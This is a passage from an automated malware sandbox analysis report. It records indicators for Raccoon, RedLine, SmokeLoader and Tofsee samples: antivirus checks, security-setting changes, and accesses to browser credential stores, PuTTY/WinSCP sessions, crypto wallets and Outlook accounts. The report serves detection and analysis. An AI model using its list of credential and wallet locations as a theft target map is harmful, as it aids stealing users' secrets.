Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2531.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Users\user\AppData\Local\Temp\2531.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4DAB.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\5CDE.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 0_2_00404A70 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 0_2_00404A70
Source: C:\Users\user\Desktop\bNdOhKPy0F.exe Code function: 1_2_6E1265A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion, 1_2_6E1265A0
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Changes security center settings (notifications, updates, antivirus, firewall)
Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval Jump to behavior
AV process strings found (often used to terminate AV products)
Source: svchost.exe, 0000000C.00000002.495722693.000002AADB702000.00000004.00000001.sdmp, 2531.exe, 00000019.00000003.484797067.00000000014B8000.00000004.00000001.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: C:\Users\user\AppData\Local\Temp\2531.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\2531.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\2531.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\2531.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\2531.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\2531.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 00000022.00000003.440389485.0000000004FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.447043795.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.429961512.0000000004FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.472532667.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.474383146.0000000004F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.443191726.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 31.2.6ACA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.3.6ACA.exe.4fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.4eb0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.88A3.exe.4fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.6ACA.exe.4f10e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.6ACA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.4eb0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.6ACA.exe.4f10e50.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.88A3.exe.4fd0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.3.6ACA.exe.4fb0000.0.unpack, type: UNPACKEDPE
Yara detected RedLine Stealer
Source: Yara match File source: 00000019.00000002.494008632.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.384825667.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2531.exe PID: 4396, type: MEMORY
Source: Yara match File source: 18.2.2531.exe.3d1c7f8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.2531.exe.3c51458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.2531.exe.3c51458.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.2531.exe.3d1c7f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.2531.exe.400000.0.unpack, type: UNPACKEDPE
Yara detected SmokeLoader
Source: Yara match File source: 00000001.00000002.299990190.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.383261410.0000000000591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.300060611.00000000004D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.383179022.0000000000570000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 24.2.webgfvd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.bNdOhKPy0F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.1.webgfvd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.bNdOhKPy0F.exe.400000.0.unpack, type: UNPACKEDPE
Yara detected SmokeLoader
Source: Yara match File source: 0000002A.00000002.494235965.00000000003E1000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.496689434.00000000032A1000.00000040.00000001.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match File source: 0000001C.00000002.443994982.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.441195671.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.414858920.00000000033F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 28.3.5CDE.exe.33f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.5CDE.exe.33b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.5CDE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.5CDE.exe.400000.0.raw.unpack, type: UNPACKEDPE
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\2531.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2531.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\AppData\Local\Temp\6ACA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\SysWOW64\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Remote Access Functionality:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 00000022.00000003.440389485.0000000004FD0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.447043795.0000000004EB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.429961512.0000000004FB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.472532667.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.474383146.0000000004F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.443191726.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 31.2.6ACA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.3.6ACA.exe.4fb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.4eb0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.88A3.exe.4fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.6ACA.exe.4f10e50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.6ACA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.88A3.exe.4eb0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.6ACA.exe.4f10e50.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.88A3.exe.4fd0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.3.6ACA.exe.4fb0000.0.unpack, type: UNPACKEDPE
Yara detected RedLine Stealer
Source: Yara match File source: 00000019.00000002.494008632.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.384825667.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2531.exe PID: 4396, type: MEMORY
Source: Yara match File source: 18.2.2531.exe.3d1c7f8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.2531.exe.3c51458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.2531.exe.3c51458.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 18.2.2531.exe.3d1c7f8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.2531.exe.400000.0.unpack, type: UNPACKEDPE
Yara detected SmokeLoader
Source: Yara match File source: 00000001.00000002.299990190.0000000000460000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.383261410.0000000000591000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.300060611.00000000004D1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.383179022.0000000000570000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 24.2.webgfvd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.bNdOhKPy0F.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.1.webgfvd.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.bNdOhKPy0F.exe.400000.0.unpack, type: UNPACKEDPE
Yara detected SmokeLoader
Source: Yara match File source: 0000002A.00000002.494235965.00000000003E1000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.496689434.00000000032A1000.00000040.00000001.sdmp, type: MEMORY
Yara detected Tofsee
Source: Yara match File source: 0000001C.00000002.443994982.00000000033B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.441195671.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.414858920.00000000033F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 28.3.5CDE.exe.33f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.5CDE.exe.33b0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.5CDE.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.5CDE.exe.400000.0.raw.unpack, type: UNPACKEDPE
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs